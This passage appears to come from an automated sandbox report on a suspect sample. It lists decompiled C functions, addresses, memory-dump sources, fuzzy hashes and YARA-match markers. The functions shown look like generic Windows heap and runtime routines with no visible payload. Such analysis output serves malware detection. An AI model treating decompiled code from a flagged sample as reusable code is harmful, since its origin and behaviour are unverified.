						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x4b38724 & 0x00000004;
							if(( *0x4b38724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x4b38724; // 0x0
					return E04AF8DF1(__ebx, 0xc0000374, 0x4b35890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x04b02076
0x04b02078
0x04b0207d
0x04b02083
0x04b020a4
0x04b020aa
0x04b020ac
0x04b020b7
0x04b020ba
0x04b020bc
0x04b020c9
0x04b020c9
0x04b020d0
0x04b020d2
0x00000000
0x04b020d2
0x04b020be
0x04b020c3
0x04b020c5
0x04b020c7
0x00000000
0x00000000
0x04b020c7
0x04b020bc
0x04b020d4
0x04b02085
0x04b02085
0x04b020a3
0x04b020a3

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46d4cd5f6faa858f5f774a732d5680d23d6e6ffe14d51f3489c7462cd5640cac
Instruction ID: 29739620799e98394a1f850cdceb55f31300ab7512754fcbb0ff9beb164b7eb4
Opcode Fuzzy Hash: 46d4cd5f6faa858f5f774a732d5680d23d6e6ffe14d51f3489c7462cd5640cac
Instruction Fuzzy Hash: 27F027264112848AEF3A7F3A25043D53FC5C74521AB0984C7F8505B240D638AD87CB22

Uniqueness

Uniqueness Score: -1.00%

Function 04A8927A, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E04A8927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L04A64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E04A8FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E04A892C6(_t11, _t14);
				}
				return _t11;
			}

0x04a89295
0x04a89299
0x04a8929f
0x04a892aa
0x04a892ad
0x04a892ae
0x04a892af
0x04a892b0
0x04a892b4
0x04a892bb
0x04a892bb
0x04a892c5

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: cac9a20e1aded4b0cf6d4837055d42f05265c5dbfea34c9941ed196c3d114a13
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: ECE0ED722406002BE721AF0ACC80B1376ADEF82728F00407CB9001F282CAE6E80887A0

Uniqueness

Uniqueness Score: -1.00%

Function 04B18CD6, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E04B18CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x4b3d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E04A67D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E04A8B640(E04A89AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x04b18ce5
0x04b18ced
0x04b18cf0
0x04b18cfb
0x04b18d0d
0x04b18cfd
0x04b18d06
0x04b18d06
0x04b18d18
0x04b18d19
0x04b18d1b
0x04b18d20
0x04b18d33

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a7ed31d6b8055cbefcfa424e03aeac67f0ecc5e2e0a6c9b670014fb75c10c65
Instruction ID: c24322c119f1a49c36cf9d3e913e402173de7775679e650852023e113d547a25
Opcode Fuzzy Hash: 2a7ed31d6b8055cbefcfa424e03aeac67f0ecc5e2e0a6c9b670014fb75c10c65
Instruction Fuzzy Hash: DBF08270A04208ABDB04EBA9D945EAE77B8FF08304F50019EF916EB290EA34ED00D754

Uniqueness

Uniqueness Score: -1.00%

Function 04A6746D, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E04A6746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E04A5EB70(__ecx, 0x4b379a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E04A895D0();
							L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x04a6746d
0x04a6746d
0x04a6746d
0x04a67471
0x04a67488
0x04aaf92d
0x04a6748e
0x04a67491
0x04a67495
0x04aaf937
0x04aaf93a
0x04aaf94e
0x04aaf953
0x04aaf956
0x04aaf956
0x04a67495
0x00000000
0x04a67488
0x04a67473
0x04a67478
0x04a6747d
0x04a67481
0x00000000
0x04a67481
0x04a6747d
0x04a6747a
0x00000000

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e42450c814eeebd036856f90d95ef8529e7cd0d315d9fb794e029536788e416
Instruction ID: 43f8538813f678271b5d136698405f67b3cba9f7ee65f5139daff7ac9ad5a47e
Opcode Fuzzy Hash: 4e42450c814eeebd036856f90d95ef8529e7cd0d315d9fb794e029536788e416
Instruction Fuzzy Hash: 04F0BE38A20144AADF069B78C948B7ABFB1AF0435CF044259EC53AB160F724F8008B85

Uniqueness

Uniqueness Score: -1.00%

Function 04A44F2E, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04A44F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E04B188F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E04A6C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x4a21030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x04a44f2e
0x04a44f34
0x04a44f38
0x04aa0b85
0x04aa0b85
0x04aa0b89
0x04aa0b9a
0x04aa0b9a
0x04aa0b9f
0x00000000
0x04aa0b9f
0x04aa0b94
0x04aa0b98
0x00000000
0x00000000
0x00000000
0x04aa0b98
0x04a44f3e
0x04a44f48
0x00000000
0x04a44f6e
0x00000000
0x04a44f70

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 814e538786f1e07f9bc625cc8d48b01eb26dd16f499170f9cbdd1c105fc030f6
Instruction ID: 369dad761aed3a43802f12302c7c0f09f4bbbef9e1acf1ec04fce25dc2c8d52e
Opcode Fuzzy Hash: 814e538786f1e07f9bc625cc8d48b01eb26dd16f499170f9cbdd1c105fc030f6
Instruction Fuzzy Hash: 7AF0EC3292A6948FE771DF28C780B23B7E8EB14BB8F4444A4D40687A20C724FC9CC690

Uniqueness

Uniqueness Score: -1.00%

Function 04B18B58, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E04B18B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x4b3d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E04A67D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E04A8B640(E04A89AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x04b18b67
0x04b18b6f
0x04b18b72
0x04b18b7d
0x04b18b8f
0x04b18b7f
0x04b18b88
0x04b18b88
0x04b18b9a
0x04b18b9b
0x04b18b9d
0x04b18ba2
0x04b18bb5

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ab77a30357f008e90604d4c6b66f51b46a2dc8f8776dffbacc307c8e2f37669
Instruction ID: 0007677f39434f5332616fa3b8d627adaa6428a721dfb461b21529c18b7ef732
Opcode Fuzzy Hash: 7ab77a30357f008e90604d4c6b66f51b46a2dc8f8776dffbacc307c8e2f37669
Instruction Fuzzy Hash: D2F089B0A14258ABEB00FBA4D645E7F73B8FF04304F540499BA05DB390FA34E900C794

Uniqueness

Uniqueness Score: -1.00%

Function 04A7A44B, Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04A7A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x4b37b9c; // 0x0
				_t15 = __ecx;
				_t16 = L04A64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E04A8FA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x04a7a44b
0x04a7a453
0x04a7a472
0x04a7a476
0x00000000
0x04a7a493
0x04a7a47a
0x04a7a47f
0x04a7a486
0x00000000

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 620657af2a2557576d6186de0319e98d0d614869cb1ab7a145ef5297a09dc47c
Instruction ID: d5968679b754386c4e5a2829b6c86c417b31309b9012a74ba49791ed5938c28a
Opcode Fuzzy Hash: 620657af2a2557576d6186de0319e98d0d614869cb1ab7a145ef5297a09dc47c
Instruction Fuzzy Hash: 31E09272A41421ABD2215B18AC00F6BB3ADDBD5656F098039F505C7210DA29ED01C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 04A4F358, Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E04A4F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E04A7F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L04A64620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x04a4f35d
0x04a4f361
0x04a4f367
0x04a4f372
0x04a4f38c
0x04a4f38c
0x04a4f394

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: e1d37afa4fb0a5db65e01955a583e85d6ca48ea1a2a719243b1f2bd798de17a9
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: 5DE0DF32A41118BFDB31AAD99E05FABBBACDB88B60F000196F904D7150D560BE00C6D0

Uniqueness

Uniqueness Score: -1.00%

Function 04A5FF60, Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04A5FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x4a211a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E04B188F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E04A60050(_t14);
				}
			}

0x04a5ff66
0x04a5ff6b
0x00000000
0x04a5ff8f
0x00000000
0x04a5ff8f

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfec71c97f9187e704d717b96dcd7fc2299e6a1e63b2892c4eaa2d8853143eee
Instruction ID: 6267ed62a1dda00df41ec3d8265ed2371eab5420c9da06dca8923fe73eb29588
Opcode Fuzzy Hash: cfec71c97f9187e704d717b96dcd7fc2299e6a1e63b2892c4eaa2d8853143eee
Instruction Fuzzy Hash: 4BE0DFF02092049FE735DB55D340F2537A9AB42729F1A805DF80A4B9A1C631F884C216

Uniqueness

Uniqueness Score: -1.00%

Function 04AD41E8, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E04AD41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x4b208f0);
				_t5 = E04A9D08C(__ebx, __edi, __esi);
				if( *0x4b387ec == 0) {
					E04A5EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x4b387ec == 0) {
						 *0x4b387f0 = 0x4b387ec;
						 *0x4b387ec = 0x4b387ec;
						 *0x4b387e8 = 0x4b387e4;
						 *0x4b387e4 = 0x4b387e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L04AD4248();
				}
				return E04A9D0D1(_t5);
			}

0x04ad41e8
0x04ad41ea
0x04ad41ef
0x04ad41fb
0x04ad4206
0x04ad420b
0x04ad4216
0x04ad421d
0x04ad4222
0x04ad422c
0x04ad4231
0x04ad4231
0x04ad4236
0x04ad423d
0x04ad423d
0x04ad4247

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1662f8dfd4adcf843300caeb2c0ad0e79dcb0e85e9304bebc420898c5e266f9b
Instruction ID: 495b21b26294c1707e78e33fe38a0140f8c688131d7745bdc3be0fe437833f93
Opcode Fuzzy Hash: 1662f8dfd4adcf843300caeb2c0ad0e79dcb0e85e9304bebc420898c5e266f9b
Instruction Fuzzy Hash: E1F0F275820700DFEBA0FFABA60470836E6E74821AF00415AA1099B294C7387980CF23

Uniqueness

Uniqueness Score: -1.00%

Function 04AFD380, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04AFD380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L04A4E8B0(__ecx, _a4, 0xfff);
					L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x04afd38a
0x04afd39b
0x04afd3b1
0x00000000
0x04afd3b6
0x00000000

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: aa4c620448f5608b1cf006163dbe0952cae7d76e3be21d64d3785bf5265ef177
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: E0E0C231280204BBEB226F84CD00FA97B26EB80BA5F104031FF095A690C679BC91E6C4

Uniqueness

Uniqueness Score: -1.00%

Function 04A7A185, Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04A7A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x4b367e4 >= 0xa) {
					if(_t5 < 0x4b36800 || _t5 >= 0x4b36900) {
						return L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E04A60010(0x4b367e0, _t5);
				}
			}

0x04a7a190
0x04a7a1a6
0x04a7a1c2
0x00000000
0x00000000
0x00000000
0x04a7a192
0x04a7a192
0x04a7a19f
0x04a7a19f

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03652a5bc2a1dd9b0c2b36bf29a6fa8db49ceb462cf941a2bbef8178e3a6e552
Instruction ID: 2be03df2e7460ceacec27205a3b09f07fe79bf64b5e516d80751f232e825d95b
Opcode Fuzzy Hash: 03652a5bc2a1dd9b0c2b36bf29a6fa8db49ceb462cf941a2bbef8178e3a6e552
Instruction Fuzzy Hash: 71D02E63132000BAF63C6717AE14B2A3312E788B4EF314C8EF1070B9A0DA74FCE08119

Uniqueness

Uniqueness Score: -1.00%

Function 04A716E0, Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04A716E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E04A71710(0x4b367e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L04A64620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x04a716e8
0x04a716ef
0x04a716f3
0x04a716fe
0x00000000
0x04a71700
0x04a7170d
0x04a7170d
0x04a716f2
0x04a716f2
0x04a716f2
0x04a716f2

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a96c275462a5d40ffc5e7c3c1fd46c142d8afb179a3d69fb0d4d79edef1f0577
Instruction ID: 3175f433a502f25ab7f2d894a3eff0167eb35e201dc18cdae89c435b91f60193
Opcode Fuzzy Hash: a96c275462a5d40ffc5e7c3c1fd46c142d8afb179a3d69fb0d4d79edef1f0577
Instruction Fuzzy Hash: 2CD0A771100100A2FA3D5B159D54B153295DBC078AF38045CF107595C0CFA0FC92E48C

Uniqueness

Uniqueness Score: -1.00%

Function 72495676, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.779255223.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d401f0c6582c034b6ff4cbc0c40f822f70caad91b770c8fa9c1fd730a0237ef7
Instruction ID: c16ae4aa3ba792e91459d8321ebfb72ad710f669256c49990c05d2023324c727
Opcode Fuzzy Hash: d401f0c6582c034b6ff4cbc0c40f822f70caad91b770c8fa9c1fd730a0237ef7
Instruction Fuzzy Hash: 53C01223D4919419C611EE14BD453B4FFA9DF532AAF2463EECC147B1508553D4154289

Uniqueness

Uniqueness Score: -1.00%

Function 04AC53CA, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04AC53CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E04A5EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x04ac53ca
0x04ac53ce
0x04ac53d9
0x04ac53de
0x04ac53e1
0x04ac53e1
0x04ac53e6
0x04ac53f3
0x00000000
0x04ac53f8
0x04ac53fb

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: 94e3a7091535e6f7e5977ae34dafa1c349bb79009b652deb3317b733780c7d4b
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: 8EE08C71A10680ABCF12DF89C760F8EB7F5FB44B00F150048B4085B720C674BD00CB40

Uniqueness

Uniqueness Score: -1.00%

Function 04A735A1, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04A735A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E04A5EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x04a735a1
0x04a735a1
0x04a735a5
0x04a735ab
0x04a735ab
0x04a735b5
0x00000000
0x04a735c1
0x04a735b7

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: 8e6a8ac1b5cffcaaced484eb62f743cd9656d8aaac93bfd5b234c5646d908126
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: 6ED0A9316011809EEF21AF10CB1876C33B2BB08308F5A20698C0206862C33A6A0AF700

Uniqueness

Uniqueness Score: -1.00%

Function 04A5AAB0, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04A5AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x04a5aab6
0x04a5aabb
0x04aaa442
0x00000000
0x04aaa448
0x04aaa454
0x04aaa454
0x04a5aac1
0x04a5aac1
0x04a5aac6
0x04a5aac6

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: f60e504c4f3a58df4110f192befa4fd3fca0773eb1ea0c3c0eb3aae7550b4145
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: CCD0C235352A80CFD7168B19C564B1573A4BB44B44FC50590E901CBA62E628E954CA10

Uniqueness

Uniqueness Score: -1.00%

Function 04ACA537, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04ACA537(intOrPtr _a4, intOrPtr _a8) {

				return L04A68E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x04aca553

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: 7c7b0eaf5cd1ef83f166b24f44ac7e4be1dce6fd51241cda23787e1122fb4280
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: E9C01232080248BBCB126E81CD00F067B2AEB94B60F008014BA480A560863AE970EA84

Uniqueness

Uniqueness Score: -1.00%

Function 04A4DB40, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04A4DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L04A64620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x04a4db4d
0x04a4db54
0x04a4db5f
0x04a4db56
0x04a4db56
0x04a4db5c
0x04a4db5c

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
